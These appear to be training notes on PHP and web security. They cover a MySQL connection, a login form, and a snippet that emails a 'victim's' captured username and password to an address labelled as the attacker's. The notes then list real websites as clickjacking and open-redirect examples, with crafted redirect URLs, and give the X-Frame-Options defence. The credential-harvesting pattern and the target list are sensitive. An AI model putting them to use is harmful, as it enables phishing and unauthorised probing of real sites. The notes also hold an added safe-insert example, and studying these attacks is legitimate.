PHP
HYPERTEXT PREPROCESSOR
It acts as middleware connecting your frontend and backend.
Write a PHP script that will connect your front-end design with the backend server.
Configure SMTP on your local server. This is done so that you can send emails
using PHP.
Create a login form with username and password. When the user enters the
credentials and clicks on the login button, you should get the credentials to your
email id.
-----------------------------------------------------------------------------------
-------------
<?php
$servername = "localhost";
$username = "root";
$password = "";
$database = "wdwasdatabase";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>
-----------------------------------------------------------------------------------
----------------------------------------------------
<html>
<body>
<form action="db.php" method="POST">
Username :
<input type ="text" name="username">
<br>
Password :
<input type="password" name="password">
<br>
<input type ="submit" name="submit">
</form>
</body>
</html>
----------
<?php
$servername = "localhost";
$username = "root";
$password = "";
$database = "wdwasdatabase";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
echo("<br>");
$un = $_POST['username'];
$pw = $_POST['password'];
mysqli_close($conn);
?>
-----------------------------------------------------------------------------------
----------------------------------------------------
How to get the values and insert them into the table.
<?php
$servername = "localhost";
$username = "root";
$password = "";
$database = "wdwasdatabase";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
echo("<br>");
$un = $_POST['username'];
$pw = $_POST['password'];
mysqli_close($conn);
?>
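The script above reads the two POST values but stops before the insert. The following is an added example, not code from the original page, showing the insert done with a prepared statement and a hashed password. The table `users` and its columns `username` and `password_hash` are assumptions; the connection settings are the ones used on the page.

```php
<?php
// Added example. Assumed (not on the page): a table `users` with
// columns `username` VARCHAR(64) and `password_hash` VARCHAR(255).
$servername = "localhost";
$username = "root";
$password = "";
$database = "wdwasdatabase";

// Make mysqli throw exceptions instead of failing silently
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Only handle a real form submission
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit('POST required');
}

// Read the form fields defensively; missing keys become empty strings
$un = trim($_POST['username'] ?? '');
$pw = $_POST['password'] ?? '';
if ($un === '' || $pw === '' || strlen($un) > 64) {
    http_response_code(400);
    exit('Username and password are required');
}

try {
    $conn = mysqli_connect($servername, $username, $password, $database);
    mysqli_set_charset($conn, 'utf8mb4');

    // Store a salted hash, never the plain-text password
    $hash = password_hash($pw, PASSWORD_DEFAULT);

    // Placeholders keep user input out of the SQL text (no SQL injection)
    $stmt = mysqli_prepare($conn, 'INSERT INTO users (username, password_hash) VALUES (?, ?)');
    mysqli_stmt_bind_param($stmt, 'ss', $un, $hash);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_close($stmt);
    mysqli_close($conn);
    echo 'Row inserted';
} catch (mysqli_sql_exception $e) {
    // Log details server-side; do not echo database errors to the browser
    error_log($e->getMessage());
    http_response_code(500);
    echo 'Could not save the record';
}
```

At login time the stored value is checked with `password_verify($pw, $hash)` rather than by comparing strings.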
-----------------------------------------------------------------------------------
----------------------------------------------------
Sending emails
<?php
$name = 'sam';
$subject = 'Credentials Caught';
$pass = 'sam1234';
$mailFrom = 'samjohn@gmail.com';
$mailTo = "attackeradamshere@gmail.com";
$headers = "From: ".$mailFrom;
$txt = "You have credentials from victim. \n Username is ".$name.".\n\n and
Password is ".$pass;
-----------------------------------------------------------------------------------
----------------------------------------------------
BUG BOUNTY
CLICKJACKING
https://www.gov.uk/
9292.com
https://www.lookout.net/test/clickjack.html
Preventive Measures:
X-Frame-Options is a security header to prevent a well-known vulnerability called
Clickjacking.
The header instructs the browser not to open a web page in a frame or iframe, based on
the configuration.
On shared web hosting, go to the .htaccess file and enter the following in the file.
On an Apache server, go to the httpd.conf file and enter the following in the file:
Header always append X-Frame-Options SAMEORIGIN
OPEN REDIRECTION
WWW.IGP.COM
WWW.COINDESK.COM
https://www.igp.com//bing.com/
https://www.coindesk.com//bing.com/